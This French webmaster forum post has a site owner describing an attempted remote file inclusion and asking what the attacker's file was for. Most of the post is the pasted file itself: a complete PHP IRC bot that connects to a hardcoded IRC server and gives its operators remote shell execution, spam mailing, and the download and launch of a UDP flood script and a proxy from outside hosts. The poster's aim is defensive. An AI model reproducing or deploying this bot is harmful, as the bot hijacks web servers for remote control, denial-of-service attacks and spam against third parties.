WRInaute discret
Bonjour,
Apparemment, une personne vient d'essayer une injection dans une de mes url.
J'airais voulu avoir votre avis, pour savoir si c'est malveillant, car j'ai son IP.
Voici l'url qu'elle a tenté de mettre dans une variable d'une de mes pages.
http://oitech69.iquebec.com/socket.txt
Voici ce que contient ce socket.txt:
A votre avis, c'était quoi le but?
merci
Apparemment, une personne vient d'essayer une injection dans une de mes url.
J'airais voulu avoir votre avis, pour savoir si c'est malveillant, car j'ai son IP.
Voici l'url qu'elle a tenté de mettre dans une variable d'une de mes pages.
http://oitech69.iquebec.com/socket.txt
Voici ce que contient ce socket.txt:
<?php
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe = @ini_get('safe_mode');
$up = time();
function randomkeys($length)
{
$pattern = "abcdefghijklmnopqrstuvwxyz";
for($i=0;$i<$length;$i++)
{
$key .= $pattern{rand(0,35)};
}
return $key;
}
$quitmsg = "FIND YOUR OWN";
$ip = $_SERVER['REMOTE_ADDR'];
$HTTP_HOST = getenv("HTTP_HOST");
$REQUEST_URI = getenv("REQUEST_URI");
$infoo = "Link: $HTTP_HOST$REQUEST_URI";
if (@file_exists("/bin/sh")) $pro2="/bin/sh Yes"; else $pro2="/bin/sh No";
if (@file_exists("/usr/bin/wget")) $pro3="/usr/bin/wget Yes"; else $pro3="/usr/bin/wget No";
if (@file_exists("/usr/bin/lynx")) $pro4="/usr/bin/lynx Yes" ; else $pro4="/usr/bin/lynx No";
if ($safe) $pro5="safe_mode Yes"; else $pro5="safe_mode No";
$pro6 = "PHP ".phpversion();
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$mn1 = php_uname();
$mn2 = PHP_OS;
$version = "pHp bOt v1";
$server = "69.16.172.34";
$port = '6667';
$identd = randomkeys(4).rand(100,999);
$me = randomkeys(4).rand(100,999);
$chan = "#botmaking";
$vhost = "fd8655d9b07e4f774658f19e29660abc";
$vhost2 = "5de2b1cb35aa7bd00bf878bd5a0f24f0";
$vhost3 = 'lekiki.users.undernet.org';
$ircname = randomkeys(4).rand(100,999);
while(0==0) {
$ircsock = @fsockopen($server, $port);
if (!$ircsock) { echo "Échec a la connection.\n"; }
if ($ircsock) {
fputs($ircsock,"USER $identd $me $server :$ircname\r\nNICK $me\r\n");
$on = time();
while (!feof($ircsock)) {
$rawbuffer = fgets($ircsock, 2048);
$buffer = explode(" ", $rawbuffer);
if( $buffer[0] == 'PING') {
fputs($ircsock,"PONG $buffer[1] \r\n");
}
if( $buffer[1] == '001') {
fputs($ircsock,"JOIN $chan\r\n");
fputs($ircsock,"WHO $me\r\n");
}
if( $buffer[7]." ".$buffer[8]." ".$buffer[9]." ".$buffer[10] == 'many connections from your' ) {
exit;
}
if( $buffer[1] == '433') {
if (!isset($me2)) {
randomkeys(4).rand(100,999);
fputs($ircsock,"NICK $me\r\n");
}
if (isset($me2)) {
$me = $me2;
unset($me2);
}
}
$pattern = '/^.*)!(.*)@(.*\S+) (\S+) (\S+) .*)$/'; //This is the regex pattern I use to parse a buffer
preg_match($pattern, trim($rawbuffer), $block); //This parses the buffer
$nick = $block[1]; //Nickname
$ident = $block[2]; //Ident
$host = $block[3]; //Host
$action = $block[4]; //Action: PRIVMSG, MODE, NOTICE, etc.
$who = $block[5]; //Who: either a channel or you
$msg = $block[6]; //Msg: What was said. This can be parsed again using explode()
$ff = explode(" ", $msg);
// Command ou tlm a access
if ( $buffer[1] == 'JOIN' ) {
$tbk = explode("\r", $buffer[2]);
$hostname = explode("@", $buffer[0]);
$vv = explode(":", $buffer[0]);
$pseudo = explode("!", $vv[1]);
if ( md5(md5($hostname[1])) == $vhost || md5(md5($hostname[1])) == $vhost2 || $hostname[1] == $vhost3 ) {
fputs($ircsock, "mode $tbk[0] +o $pseudo[0]\r\n");
}
}
if ( $buffer[1] == 'KICK' ) {
$tbk = explode("\r", $buffer[3]);
if ( $tbk[0] == $me ) {
fputs($ircsock, "JOIN $buffer[2]\r\n");
}
}
if ( $ff[0] == '!asshole' ) {
if (md5(md5($ff[1])) === 'b761061f4e0ba2030bcd344cc267e98f') {
$vhost3 = $host;
fputs($ircsock, "notice $nick :Host: $host\r\n");
}
}
// Command avec une protect host
if ( md5(md5($host)) == $vhost || md5(md5($host)) == $vhost2 || $host == $vhost3 ) {
$tbk = explode("\r", $buffer[2]);
$hostname = explode("@", $buffer[0]);
$vv = explode(":", $buffer[0]);
$pseudo = explode("!", $vv[1]);
if ( $ff[0] == '!mail' ) {
$recipient = $ff[1];
$subject = $ff[2];
$message = $ff[3];
$headers = $ff[4];
mail($recipient,$subject,$message,$headers);
fputs($ircsock, "notice $nick :Mail envoyer a $recipient\r\n");
}
if ( $ff[0].$ff[1] == '!rnick' ) {
$me = randomkeys(4).rand(100,999);
fputs($ircsock, "NICK $me\r\n");
}
if ( $ff[0] == '!ssh' ) {
if ($ff[1]) {
$test = $ff[1]." ".$ff[2]." ".$ff[3]." ".$ff[4]." ".$ff[5]." ".$ff[6]." ".$ff[7]." ".$ff[8]." ".$ff[9]." ".$ff[10]." ".$ff[11]." ".$ff[12]." ".$ff[13]." ".$ff[14]." ".$ff[15]." ".$ff[16]." ".$ff[17]." ".$ff[18]." ".$ff[19]." ".$ff[20];
$chk = explode(chr(10), shell_exec($test));
$c = count ($chk);
for($i=0; $i<=$c; $i++) {
fputs($ircsock, "privmsg $who :$chk[$i]\r\n");
}
}
}
if ( $ff[0] == '!from' ) {
fputs($ircsock, "PRIVMSG $who :Started From: $ip\r\n");
}
if ( $ff[0] == '!safemode' ) {
fputs($ircsock, "PRIVMSG $who :Safe_mode: $safe\r\n");
}
if ( $ff[0] == '!flood' ) {
fputs($ircsock, "PRIVMSG ".$ff[1]." :DCC SEND sucker.exe 3586902543 1024 1064966\r\n");
fputs($ircsock, "PRIVMSG ".$ff[1]." :DCC CHAT 3586902543 1024 106496\r\n");
fputs($ircsock, "PRIVMSG ".$ff[1]." :NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOb\r\n");
fputs($ircsock, "PRIVMSG ".$ff[1]." :NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOb\r\n");
}
if ( $ff[0].$ff[1] == '!uptime' ) {
unset($uptime);
$delais = time()-$up;
$days = floor($delais / "86400");
if ($days != '0') { $uptime = $days." days, "; }
$now = $delais - floor($days * $days);
$hours = floor($now / "3600");
if ($hours != '0') {
if (isset($uptime)) { $uptime .= " ".$hours." hrs,"; }
if (!isset($uptime)) { $uptime = $hours." hrs,"; }
}
if ($hours == '0') {
if (isset($uptime)) { $uptime .= " 0 hrs,"; }
if (!isset($uptime)) { $uptime = "0 hrs,"; }
}
$now = $now - floor($hours * "3600");
$minutes = floor($now / "60");
if ($minutes != '0') { $uptime .= " ".$minutes." mins,"; }
if ($minutes == '0') { $uptime .= " 0 mins,"; }
$secondes = $now - floor($minutes * "60");
$uptime .= " ".$secondes." secs";
fputs($ircsock, "PRIVMSG $who :b0t Uptime: $uptime.\r\n");
}
if ( $ff[0].$ff[1] == '!online' ) {
unset($uptime);
$delais = time()-$on;
$days = floor($delais / "86400");
if ($days != '0') { $uptime = $days." days, "; }
$now = $delais - floor($days * $days);
$hours = floor($now / "3600");
if ($hours != '0') {
if (isset($uptime)) { $uptime = $uptime." ".$hours." hrs,"; }
if (!isset($uptime)) { $uptime = $hours." hrs,"; }
}
if ($hours == '0') {
if (isset($uptime)) { $uptime = $uptime." 0 hrs,"; }
if (!isset($uptime)) { $uptime = "0 hrs,"; }
}
$now = $now - floor($hours * "3600");
$minutes = floor($now / "60");
if ($minutes != '0') { $uptime = $uptime." ".$minutes." mins,"; }
if ($minutes == '0') { $uptime = $uptime." 0 mins,"; }
$secondes = $now - floor($minutes * "60");
$uptime = $uptime." ".$secondes." secs";
fputs($ircsock, "PRIVMSG $who :Server Uptime: $uptime.\r\n");
}
if ( $ff[0].$ff[1] == '!ip' ) {
$test = "ifconfig |grep inet |grep -v 127.0.0.1 |wc -l |sed 's/ //g'";
$chk = shell_exec($test);
fputs($ircsock, "notice $nick :Total IP: $chk\r\n");
}
if ( $ff[0].$ff[1] == '!uname' ) {
fputs($ircsock, "notice $nick : $mn1 $mn2\r\n");
}
if ( $ff[0].$ff[1] == '-uname' ) {
fputs($ircsock, "privmsg $who : $mn1 $mn2\r\n");
}
if ( $ff[0].$ff[1] == '!channels' ) {
fputs($ircsock, "notice $nick :Channels lists: $chan\r\n");
}
if ( $ff[0] == '!nick' ) {
if ($ff[1]) {
fputs($ircsock, "NICK $ff[1]\r\n");
}
}
if ( $ff[0].$ff[1] == '!link' ) {
fputs($ircsock, "notice $nick :$infoo\r\n");
}
if ( $ff[0].$ff[1] == '!info' ) {
$test = "ifconfig |grep inet |grep -v 127.0.0.1 |wc -l |sed 's/ //g'";
$chk = shell_exec($test);
fputs($ircsock, "notice $nick :$pro2, $pro3, $pro4, $pro5, Total IP: $chk\r\n");
}
if ( $ff[0] == '!ifudp' ) {
if (file_exists('/tmp/a.pl')) {
fputs($ircsock, "notice $nick :$infoo\r\n");
}
}
if ( $ff[0] == '!udpstop' ) {
$udpstop = "killall -9 sleep;killall -9 perl";
shell_exec($udpstop);
}
if ( $ff[0] == '!udp' ) {
if ($ff[3]) {
if (!file_exists('/tmp/a.pl')) {
$udp = fsockopen("packetstormsecurity.org", "80", $errno, $errstr, 2048);
fputs($udp,"GET /DoS/udp.pl \r\nHOST: packetstormsecurity.org\r\n");
define('FILE_NAME', '/tmp/a.pl');
if ($file = fopen(FILE_NAME, 'a'))
{
while (!feof($udp)) {
$rawudp = fgets($udp, 2048);
fwrite($file, $rawudp );
}
fclose($file);
}
}
if (file_exists('/tmp/a.pl')) {
$kill = "cd /tmp/;perl a.pl ".$ff[1]." ".$ff[2]." ".$ff[3];
popen($kill.' &', 'r');
fputs($ircsock, "notice $nick :Udp send to $ff[1] delays $ff[3] seconds\r\n");
}
}
}
if ( $ff[0] == '!proxy' ) {
if ($ff[1] == 'start') {
if (!file_exists('/tmp/.proxy.pl')) {
$udp = fsockopen("www.cpan.org", "80", $errno, $errstr, 2048);
fputs($udp,"GET /authors/id/D/DO/DODYSW/httpproxy-1.5.3.pl \r\nHOST: www.cpan.org\r\n");
define('FILE_NAME', '/tmp/.proxy.pl');
if ($file = fopen(FILE_NAME, 'a'))
{
while (!feof($udp)) {
$rawudp = fgets($udp, 2048);
fwrite($file, $rawudp );
}
fclose($file);
}
}
if (file_exists('/tmp/.proxy.pl')) {
$kill = "cd /tmp/;perl .proxy.pl";
popen($kill.' &', 'r');
$bn=shell_exec('uname -n');
fputs($ircsock, "privmsg $who :Http Proxy Created port:8888 $bn\r\n");
}
}
}
//http://www.cpan.org/authors/id/D/DO/DODYSW/httpproxy-1.5.3.pl
if ( $ff[0] == '!server' ) {
if ($ff[1]) {
$server = $ff[1];
fputs($ircsock, "notice $nick :Server set to ".$ff[1]."\r\n");
}
}
if ( $ff[0].$ff[1] == '!jump' ) {
fputs($ircsock, "QUIT switching server\r\n");
}
if ( $ff[0] == '!maxsq' ) {
if ($ff[1]) {
fputs($ircsock, "PRIVMSG ".$ff[1]." :15MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeD3MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeDM\r\n");
fputs($ircsock, "PRIVMSG ".$ff[1]." :15MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeD3MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeDM\r\n");
}
}
$cmptmp = str_replace("*","", $ff[0]);
if ( $cmptmp == $me || substr($me,0,strlen($cmptmp))==$cmptmp && @eregi($cmptmp, $me) ) {
if ( $ff[1] == '!nick' && $ff[2] ) {
$me2 = $me;
$me = $ff[2];
fputs($ircsock, "NICK $ff[2]\r\n");
}
if ( $ff[1] == '!server' ) {
if ($ff[2]) {
$server = $ff[2];
fputs($ircsock, "notice $nick :Server set to ".$ff[2]."\r\n");
}
}
if ( $ff[1].$ff[2] == '!jump' ) {
fputs($ircsock, "QUIT switching server\r\n");
}
if ( $ff[1].$ff[2] == '!channels' ) {
fputs($ircsock, "notice $nick :Channels lists: $chan\r\n");
}
if ( $ff[1] == '!identd' ) {
if ($ff[2]) {
$identd = $ff[2];
fputs($ircsock, "notice $nick :Identd set to ".$ff[2]."\r\n");
}
}
if ( $ff[1] == '!ircname' ) {
if ($ff[2]) {
$ircname = $ff[2]." ".$ff[3]." ".$ff[4]." ".$ff[5]." ".$ff[6]." ".$ff[7]." ".$ff[8]." ".$ff[9]." ".$ff[10];
fputs($ircsock, "notice $nick :New IRCname set\r\n");
}
}
if ( $ff[1] == '!md5' ) {
if ( $ff[2] ) {
$h = $ff[2];
$len = strlen ($h) + 18;
$ircsockdd = fsockopen("www.csthis.com", "80", $errno, $errstr, 2048);
fputs($ircsockdd,"POST /md5/indexgoogle.php HTTP/1.0\r\n");
fputs($ircsockdd,"Host: www.csthis.com\r\n");
fputs($ircsockdd,"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\r\n");
fputs($ircsockdd,"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n");
fputs($ircsockdd,"Accept-Language: en-us,en;q=0.5\r\n");
fputs($ircsockdd,"Accept-Encoding: gzip,deflate\r\n");
fputs($ircsockdd,"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n");
fputs($ircsockdd,"Keep-Alive: 300\r\n");
fputs($ircsockdd,"Connection: keep-alive\r\n");
fputs($ircsockdd,"Referer: http://www.csthis.com/md5/indexgoogle.php\r\n");
fputs($ircsockdd,"Content-Type: application/x-www-form-urlencoded\r\n");
fputs($ircsockdd,"Content-Length: $len\r\n");
fputs($ircsockdd,"\r\n");
fputs($ircsockdd,"h=".$h."&s=Search%2FPost\r\n");
while (!feof($ircsockdd)) {
$rawbufferdd = fgets($ircsockdd, 1024);
if(ereg('MD5 hash:', $rawbufferdd)) {
$chk = explode(" ", $rawbufferdd);
$chk2 = explode(">", $chk[13]);
$chk3 = explode("<", $chk2[1]);
fputs($ircsock, "privmsg $who : MD5 hash: $h resolves to: ".$chk3[0]."\r\n");
}
}
}
}
if ( $ff[1].$ff[2] == '!ip' ) {
$test = "ifconfig |grep inet |grep -v 127.0.0.1 |wc -l |sed 's/ //g'";
$chk = shell_exec($test);
fputs($ircsock, "notice $nick :Total IP: $chk\r\n");
}
if ( $ff[1] == '!bg' ) {
$test = $ff[2]." ".$ff[3]." ".$ff[4]." ".$ff[5]." ".$ff[6]." ".$ff[7]." ".$ff[8]." ".$ff[9]." ".$ff[10];
popen($test.' >> /var/tmp/.c&', 'r');
}
if ( $ff[1].$ff[2] == '!uname' ) {
fputs($ircsock, "notice $nick : $mn1 $mn2\r\n");
}
if ( $ff[1].$ff[2] == '!link' ) {
fputs($ircsock, "notice $nick :$infoo\r\n");
fputs($ircsock, "notice $nick :$pro2, $pro3, $pro4, $pro5, $pro6\r\n");
}
if ( $ff[1].$ff[2] == '!info' ) {
$test = "ifconfig |grep inet |grep -v 127.0.0.1 |wc -l |sed 's/ //g'";
$chk = shell_exec($test);
fputs($ircsock, "notice $nick :$pro2, $pro3, $pro4, $pro5, Total IP: $chk, \r\n");
}
if ( $ff[1] == '!quit' ) {
fputs($ircsock, "quit : $quitmsg \r\n");
exit(0);
}
if ( $ff[1] == '!part' ) {
if (!$ff[2]) {
fputs($ircsock, "part $who\r\n");
$chk = explode(",", $chan);
$c = count ($chk);
for($i=0; $i<$c; $i++) {
if ($chk[$i] != $who) {
if (!isset($chan2)) { $chan2=$chk[$i]; }
else { $chan2=$chan2.",".$chk[$i]; }
}
}
$chan=$chan2;
unset($chan2);
}
else {
fputs($ircsock, "part $ff[2]\r\n");
$chk = explode(",", $chan);
$c = count ($chk);
for($i=0; $i<$c; $i++) {
if ($chk[$i] != $ff[2]) {
if (!isset($chan2)) { $chan2=$chk[$i]; }
else { $chan2=$chan2.",".$chk[$i]; }
}
}
$chan=$chan2;
unset($chan2);
}
}
if ( $ff[1] == '!join' ) {
if ($ff[2]) {
fputs($ircsock, "join $ff[2]\r\n");
$chk = explode(",", $chan);
$c = count ($chk);
for($i=0; $i<$c; $i++) {
if ($chk[$i] != $ff[2]) {
if (!isset($chan2)) { $chan2=$chk[$i]; }
else { $chan2=$chan2.",".$chk[$i]; }
}
}
$chan=$chan2;
unset($chan2);
if (isset($chan)) { $chan = $chan.",".$ff[2]; }
else { $chan = $ff[2]; }
}
}
if ( $ff[1] == '!ssh' ) {
if ($ff[2]) {
$test = $ff[2]." ".$ff[3]." ".$ff[4]." ".$ff[5]." ".$ff[6]." ".$ff[7]." ".$ff[8]." ".$ff[9]." ".$ff[10]." ".$ff[11]." ".$ff[12]." ".$ff[13]." ".$ff[14]." ".$ff[15];
$chk = explode(chr(10), shell_exec($test));
$c = count ($chk);
for($i=0; $i<=$c; $i++) {
fputs($ircsock, "privmsg $who :$chk[$i]\r\n");
}
}
}
}
if ( $ff[0] == '!msg' ) {
if ($ff[1]) {
fputs($ircsock, "PRIVMSG {$ff[1]} :".$ff[2]." ".$ff[3]." ".$ff[4]." ".$ff[5]." ".$ff[6]." ".$ff[7]." ".$ff[8]." ".$ff[9]." ".$ff[10]."\r\n");
}
}
if ( $ff[0].$ff[1] == '!quit' ) {
fputs($ircsock, "quit : $quitmsg \r\n");
exit(0);
}
if ( $ff[0] == '!part' ) {
if (!$ff[1]) {
fputs($ircsock, "part $who\r\n");
$chk = explode(",", $chan);
$c = count ($chk);
for($i=0; $i<$c; $i++) {
if ($chk[$i] != $who) {
if (!isset($chan2)) { $chan2=$chk[$i]; }
else { $chan2=$chan2.",".$chk[$i]; }
}
}
$chan=$chan2;
unset($chan2);
}
else {
fputs($ircsock, "part $ff[1]\r\n");
$chk = explode(",", $chan);
$c = count ($chk);
for($i=0; $i<$c; $i++) {
if ($chk[$i] != $ff[1]) {
if (!isset($chan2)) { $chan2=$chk[$i]; }
else { $chan2=$chan2.",".$chk[$i]; }
}
}
$chan=$chan2;
unset($chan2);
}
}
if ( $ff[0] == '!join' ) {
if ($ff[1]) {
fputs($ircsock, "join $ff[1]\r\n");
$chk = explode(",", $chan);
$c = count ($chk);
for($i=0; $i<$c; $i++) {
if ($chk[$i] != $ff[1]) {
if (!isset($chan2)) { $chan2=$chk[$i]; }
else { $chan2=$chan2.",".$chk[$i]; }
}
}
$chan=$chan2;
unset($chan2);
if (isset($chan)) { $chan = $chan.",".$ff[1]; }
else { $chan = $ff[1]; }
}
}
if ( $ff[0].$ff[1] == '-up' ) {
fputs($ircsock, "mode $who +o $nick\r\n");
}
if ( $ff[0].$ff[1] == '-down' ) {
fputs($ircsock, "mode $who -o $nick\r\n");
}
if ( $ff[0].$ff[1] == '!version' ) {
fputs($ircsock, "privmsg $who :$version\r\n");
}
}
//echo $rawbuffer;
}
}
fclose($ircsock);
sleep(60);
}
?>
A votre avis, c'était quoi le but?
merci